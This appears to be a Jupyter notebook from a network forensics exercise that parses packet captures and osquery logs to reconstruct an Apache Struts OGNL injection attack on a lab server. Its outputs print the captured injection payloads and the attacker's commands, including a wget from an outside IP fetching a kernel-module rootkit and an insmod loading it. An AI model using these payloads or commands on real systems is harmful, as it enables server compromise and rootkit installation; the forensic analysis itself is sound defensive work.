In [265]:
import pandas as pd
import pyshark
import fileinput
from pandas.io.json import json_normalize

In [171]:
log_list = []
for line in fileinput.input('osqueryd.results.log'):
    log_list.append(eval(line))

In [172]:
log_data = json_normalize(log_list, sep='_')

In [173]:
log_data.to_csv('osqueryd.csv')

In [174]:
http = pyshark.FileCapture('http.pcap', keep_packets=True)
http.load_packets()

Cancelling an overlapped future failed
future: <_OverlappedFuture pending overlapped=<pending, 0x1a5ea1a60d0> cb=[BaseProactorEventLoop._loop_self_reading()]>
Traceback (most recent call last):
  File "D:\Applications\Anaconda3\lib\site-packages\trollius\windows_events.py", line 56, in _cancel_overlapped
    self._ov.cancel()
OSError: [WinError 6] The handle is invalid


In [175]:
len(http)

604

In [176]:
dns = pyshark.FileCapture('dns.pcap', keep_packets=True)
dns.load_packets()

Cancelling an overlapped future failed
future: <_OverlappedFuture pending overlapped=<pending, 0x1a5edcf3160> cb=[BaseProactorEventLoop._loop_self_reading()]>
Traceback (most recent call last):
  File "D:\Applications\Anaconda3\lib\site-packages\trollius\windows_events.py", line 56, in _cancel_overlapped
    self._ov.cancel()
OSError: [WinError 6] The handle is invalid


In [177]:
len(dns)

3761

In [269]:
df_http = []
for pkt in http:
    if 'HTTP' not in str(pkt.layers):
        continue
    uri = pkt.http.get('request_uri')
    content_type = pkt.http.get('content-type')
    if uri or content_type:
        d = {
            'timestamp': pkt.sniff_time.timestamp(),
            'length': int(pkt.length),
            'highest_layer': pkt.highest_layer,
            'query_page': uri,
            'content_type': content_type,
            'src_ip': pkt.ip.src,
            'dest_ip': pkt.ip.dst,
            'dest_port': pkt.tcp.dstport
        }
        df_http.append(d)
df_http = pd.DataFrame(df_http)
df_http.fillna(value=float('nan'), inplace=True)
df_http.to_csv('df_http.csv')
df_http

,content_type,dest_ip,dest_port,highest_layer,length,query_page,src_ip,timestamp
0,NaN,172.17.0.2,8080,HTTP,766,/j,10.0.2.2,1.521395e+09
1,text/html;charset=ISO-8859-1,10.0.2.2,55952,DATA-TEXT-LINES,459,NaN,172.17.0.2,1.521395e+09
2,NaN,172.17.0.2,8080,HTTP,703,/struts/utils.js,10.0.2.2,1.521395e+09
3,text/javascript,10.0.2.2,55952,DATA-TEXT-LINES,59,NaN,172.17.0.2,1.521395e+09
4,NaN,172.17.0.2,8080,HTTP,765,/,10.0.2.2,1.521395e+09
5,text/html,10.0.2.2,55952,HTTP,211,NaN,172.17.0.2,1.521395e+09
6,NaN,172.17.0.2,8080,HTTP,780,/showcase.action,10.0.2.2,1.521395e+09
7,text/html;charset=ISO-8859-1,10.0.2.2,55952,DATA-TEXT-LINES,459,NaN,172.17.0.2,1.521395e+09
8,NaN,172.17.0.2,8080,HTTP,717,/struts/utils.js,10.0.2.2,1.521395e+09
9,text/javascript,10.0.2.2,55952,DATA-TEXT-LINES,59,NaN,172.17.0.2,1.521395e+09


## SubTask 1

### First attempt scan timestamp

In [209]:
df_http[(df_http['query_page']=='/showcase.action') & (df_http['src_ip']=='172.17.0.1')]['timestamp'].values[0]

1521394990.943891

### The vulnerable server's IP address is 172.17.0.2, Port Number is 8080

In [270]:
df_http[(df_http['query_page']=='/showcase.action') & (df_http['content_type'])][['content_type','src_ip','dest_ip', 'dest_port']]

,content_type,src_ip,dest_ip,dest_port
104,".multipart/form-data~${#context[""com.opensymph...",172.17.0.1,172.17.0.2,8080
107,".multipart/form-data~${#context[""com.opensymph...",172.17.0.1,172.17.0.2,8080
109,".multipart/form-data~${#context[""com.opensymph...",172.17.0.1,172.17.0.2,8080
118,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
119,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
120,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
122,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
123,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
124,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080
125,%{(#_='multipart/form-data').(#dm=@ognl.OgnlCo...,172.17.0.1,172.17.0.2,8080


In [271]:
content_sent = df_http[(df_http['dest_ip']=='172.17.0.2') & (df_http['content_type'])]['content_type'].values
content_sent_len = list(map(lambda x: (len(x), x),list(content_sent)))

In [272]:
for item in content_sent_len:
    print('\033[1m\033[4mContent-type\033[0m: {}\n\033[1m\033[4mLength\033[0m: {}\n'.format(item[1], item[0]))

Content-type: .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)}
Length: 144

Content-type: .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)}
Length: 144

Content-type: .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)}
Length: 144

Content-type: application/x-www-form-urlencoded
Length: 33

Content-type: application/x-www-form-urlencoded
Length: 33

Content-type: application/x-www-form-urlencoded
Length: 33

Content-type: application/x-www-form-urlencoded
Length: 33

Content-type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opens

In [273]:
cmd_set = set()
for ctd in content_sent:
    cmd = ctd.split('cmd=\'')
    if len(cmd) > 1:
        cmd_set.add(cmd[1].split('\'')[0])

In [274]:
cmd_set

{'insmod rk.ko.1', 'ls', 'wget http://162.212.156.148/rk.ko > rk.ko', 'whoami'}

### Correspondingly, the command name existence are
    whoami    Yes    Displays the name of the current user
    wget      Yes    Downloads Kernel Module
    ls        Yes    List contents in currect directory
    cat       No
    cd        No
    insmod    Yes    Install Kernel Module
    ssh       No